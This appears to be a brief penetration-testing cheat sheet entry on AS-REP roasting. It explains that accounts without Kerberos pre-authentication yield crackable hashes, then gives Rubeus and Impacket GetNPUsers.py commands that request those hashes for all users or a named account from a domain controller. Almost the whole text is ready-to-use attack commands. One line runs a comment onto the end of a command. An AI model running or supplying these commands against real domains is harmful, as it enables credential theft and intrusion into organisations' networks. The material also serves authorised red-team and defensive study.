If a user does not require Kerberos pre-authentication, an attacker can request an AS-REP for the user and crack the retrieved hash offline.
# AS-REP Roast all users (burn your opsec):
.\Rubeus.exe asreproast /nowrap
# AS-REP Roast a specific user:
.\Rubeus.exe asreproast /user:$serviceaccount /nowrap# AS-REP Roast with Impacket
python3 GetNPUsers.py $domain -dc-ip $dcip -usersfile $userfile